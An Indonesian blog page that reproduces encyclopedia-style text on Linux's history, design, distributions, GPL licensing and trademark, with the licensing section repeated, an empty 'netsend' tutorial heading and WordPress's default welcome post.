Linux kernel dan sebagian besar perangkat lunak GNU menggunakan GNU General Public License (GPL) sebagai basis lisensinya. GPL mengharuskan siapapun yang mendistribusikan kernel linux harus membuat kode sumber (dan semua modifikasi atas itu) tersedia bagi pengguna dengan kriteria yang sama. Tahun 1997, Linus Torvald menyatakan, “Menjadikan Linux berbasis GPL sungguh merupakan hal terbaik yang pernah saya lakukan.”[34] Komponen penting lain dalam sistem Linux diijinkan menggunakan lisensi selain dari GPL; banyak pustaka menggunakan GNU Lesser General Public License (LGPL), varian GPL yang lebih moderat, dan sistem X Window System menggunakan MIT License.

Linus Torvald telah menyatakan ke khayalak umum bahwa ia tidak akan memindahkan lisensi kernel Linux yang saat ini menggunakan GPL versi 2 ke GPL versi 3, yang ditembangkan pada pertengahan tahun 2007, dengan alasan beberapa ketentuan yang terdapat pada lisensi baru tersebut melarang penggunaan perangkat lunak dalam manajemen hak digital (Inggris: Digital rights management).

Penelitian yang dilakukan pada tahun 2001 terhadap Red Hat Linux 7.1 menemukan bahwa distro perangkat lunak tersebut terdiri atas 30 juta baris kode. Dengan menggunakan algoritma model biaya konstruktif (Inggris:Constructive Cost Model), penelitian itu memperkirakan bahwa distro tersebut membutuhkan waktu kira-kira delapan ribu tahun kerja untuk mengembangkannya. Menurut penelitian tersebut, jika semua elemen dari perangkat lunak tersebut dikembangkan dengan cara konvensional dalam artian sebagai perangkat lunak tertutup, pengembangan distro tersebut akan menelan biaya sebesar 1,08 miliar dolar (basis nilai tukar dolar tahun 2000) untuk dikembangkan di Amerika Serikat.

Sebagian besar kode (71%) ditulis dengan menggunakan bahasa pemrograman C, namun banyak bahasa lainnya juga ikut terlibat seperti C++, Assembly, Perl, Python, Fortran, dan berbagai bahasa skrip lain. Lebih dari separuh dari seluruh kode dilisensikan di bawah naungan GPL. Kernel linux itu sendiri terdiri atas 2,4 juta baris kode, atau sekitar 8% dari total keseluruhan.

Penelitian lainnya menghasilkan analisis yang sama terhadap distro Debian GNU/Linux versi 4.0. Distro tersebut terdiri atas lebih dari 283 juta baris kode, dan penelitian tersebut memperkirakan biaya pengembangan yang dibutuhkan sebesar 5,4 miliar euro jika dikembangkan sebagai perangkat linak tertutup.

Di Amerika Serikat, Linux merupakan merek dagang (SN: 1916230) yang dimiliki oleh Linus Torvalds. Linux terdaftar sebagai “Program sistem operasi komputer bagi penggunaan komputer dan operasi”. Merek dagang ini didaftarkan setelah ada suatu kejadian di mana seorang pemalsu bernama William R Della Croce Jr mulai mengirim surat kepada para distributor Linux dan megklaim trademark Linux adalah hakmiliknya serta meminta royalti sebanyak 10% dari mereka. Para distributor Linux mulai mendorong agar trademark yang asli diberikan kepada Linus Torvalds. Pemberian lisensi trademark Linux sekarang dibawah pengawasan Linux Mark Institute.

preferensi: klick disini

tutorial netsend

di bawah ini adalah tutorial netsend yang saya ambil dari youtube ,selamat menikmati:

Sejarah

Sistem operasi Unix dikembangkan dan diimplementasikan pada tahun 1960-an dan pertama kali dirilis pada 1970. Faktor ketersediaannya dan kompatibilitasnya yang tinggi menyebabkannya dapat digunakan, disalin dan dimodifikasi secara luas oleh institusi-institusi akademis dan pada pebisnis.

Proyek GNU

Proyek GNU yang mulai pada 1984 memiliki tujuan untuk membuat sebuah sistem operasi yang kompatibel dengan Unix dan lengkap dan secara total terdiri atas perangkat lunak bebas. Tahun 1985, Richard Stallman mendirikan Yayasan Perangkat Lunak Bebas dan mengembangkan Lisensi Publik Umum GNU (GNU General Public License atau GNU GPL). Kebanyakan program yang dibutuhkan oleh sebuah sistem operasi (seperti pustaka, kompiler, penyunting teks, shell Unix dan sistem jendela) diselesaikan pada awal tahun 1990-an, walaupun elemen-elemen tingkat rendah seperti device driver, jurik dan kernel masih belum selesai pada saat itu. Linus Torvalds pernah berkata bahwa jika kernel GNU sudah tersedia pada saat itu (1991), dia tidak akan memutuskan untuk menulis versinya sendiri.

Desain

Linux merupakan sistem operasi bertipe Unix modular. Linux memiliki banyak disain yang berasal dari disain dasar Unix yang dikembangkan dalam kurun waktu 1970-an hingga 1980-an. Linux menggunakan sebuah kernel monolitik, kernel Linux yang menangani kontrol proses, jaringan, periferal dan pengaksesan sistem berkas. Device driver telah terintegrasi ke dalam kernel.

Banyak fungsi-fungsi tingkat tinggi di Linux ditangani oleh proyek-proyek terpisah yang berintegrasi dengan kernel. Userland GNU merupakan sebuah bagian penting dari sistem Linux yang menyediakan shell dan peralatan-peralatan yang menangani banyak fungsi-fungsi dasar sistem operasi. Di atas kernel, peralatan-peralatan ini membentuk sebuah sistem Linux lengkap dengan sebuah antarmuka pengguna grafis yang dapat digunakan, umumnya berjalan di atas X Window System.

Distribusi Linux

Lihat juga Distribusi Linux

Terdapat banyak distribusi Linux (lebih dikenali sebagai distro) yang dibuat oleh individu, grup, atau lembaga lain. Masing-masing disertakan dengan program sistem dan program aplikasi tambahan, di samping menyertakan suatu program yang memasang keseluruhan sistem di komputer (installer program).

Inti di setiap distribusi Linux adalah kernel, koleksi program dari proyek GNU (atau proyek lain), cangkang (shell), dan aturcara utilitas seperti pustaka (libraries), kompilator, dan penyunting (editor). Kebanyakan sistem juga menyertakan aturcara dan utilitas yang bukan-GNU. Bagaimanapun, utilitas tersebut dapat dipisahkan dan sistem ala UNIX masih tersedia. Beberapa contoh adalah aturcara dan utiliti dari BSD dan sistem grafik-X (X-Window System). X menyediakan antarmuka grafis (GUI) yang umum untuk Linux.

Contoh-contoh distribusi Linux :

Hak cipta dan merek dagang

Linux kernel dan sebagian besar perangkat lunak GNU menggunakan GNU General Public License (GPL) sebagai basis lisensinya. GPL mengharuskan siapapun yang mendistribusikan kernel linux harus membuat kode sumber (dan semua modifikasi atas itu) tersedia bagi pengguna dengan kriteria yang sama. Tahun 1997, Linus Torvald menyatakan, “Menjadikan Linux berbasis GPL sungguh merupakan hal terbaik yang pernah saya lakukan.”[34] Komponen penting lain dalam sistem Linux diijinkan menggunakan lisensi selain dari GPL; banyak pustaka menggunakan GNU Lesser General Public License (LGPL), varian GPL yang lebih moderat, dan sistem X Window System menggunakan MIT License.

Linus Torvald telah menyatakan ke khayalak umum bahwa ia tidak akan memindahkan lisensi kernel Linux yang saat ini menggunakan GPL versi 2 ke GPL versi 3, yang ditembangkan pada pertengahan tahun 2007, dengan alasan beberapa ketentuan yang terdapat pada lisensi baru tersebut melarang penggunaan perangkat lunak dalam manajemen hak digital (Inggris: Digital rights management).

Penelitian yang dilakukan pada tahun 2001 terhadap Red Hat Linux 7.1 menemukan bahwa distro perangkat lunak tersebut terdiri atas 30 juta baris kode. Dengan menggunakan algoritma model biaya konstruktif (Inggris:Constructive Cost Model), penelitian itu memperkirakan bahwa distro tersebut membutuhkan waktu kira-kira delapan ribu tahun kerja untuk mengembangkannya. Menurut penelitian tersebut, jika semua elemen dari perangkat lunak tersebut dikembangkan dengan cara konvensional dalam artian sebagai perangkat lunak tertutup, pengembangan distro tersebut akan menelan biaya sebesar 1,08 miliar dolar (basis nilai tukar dolar tahun 2000) untuk dikembangkan di Amerika Serikat.

Sebagian besar kode (71%) ditulis dengan menggunakan bahasa pemrograman C, namun banyak bahasa lainnya juga ikut terlibat seperti C++, Assembly, Perl, Python, Fortran, dan berbagai bahasa skrip lain. Lebih dari separuh dari seluruh kode dilisensikan di bawah naungan GPL. Kernel linux itu sendiri terdiri atas 2,4 juta baris kode, atau sekitar 8% dari total keseluruhan.

Penelitian lainnya menghasilkan analisis yang sama terhadap distro Debian GNU/Linux versi 4.0. Distro tersebut terdiri atas lebih dari 283 juta baris kode, dan penelitian tersebut memperkirakan biaya pengembangan yang dibutuhkan sebesar 5,4 miliar euro jika dikembangkan sebagai perangkat linak tertutup.

Di Amerika Serikat, Linux merupakan merek dagang (SN: 1916230) yang dimiliki oleh Linus Torvalds. Linux terdaftar sebagai “Program sistem operasi komputer bagi penggunaan komputer dan operasi”. Merek dagang ini didaftarkan setelah ada suatu kejadian di mana seorang pemalsu bernama William R Della Croce Jr mulai mengirim surat kepada para distributor Linux dan megklaim trademark Linux adalah hakmiliknya serta meminta royalti sebanyak 10% dari mereka. Para distributor Linux mulai mendorong agar trademark yang asli diberikan kepada Linus Torvalds. Pemberian lisensi trademark Linux sekarang dibawah pengawasan Linux Mark Institute.

preferensi: klick disini

Hello world!

Welcome to WordPress.com. After you read this, you should delete and write your own post, with a new title above. Or hit Add New on the left (of the admin dashboard) to start a fresh post.

Here are some suggestions for your first post.

  1. You can find new ideas for what to blog about by reading the Daily Post.
  2. Add PressThis to your browser. It creates a new blog post for you about any interesting  page you read on the web.
  3. Make some changes to this page, and then hit preview on the right. You can alway preview any post or edit you before you share it to the world.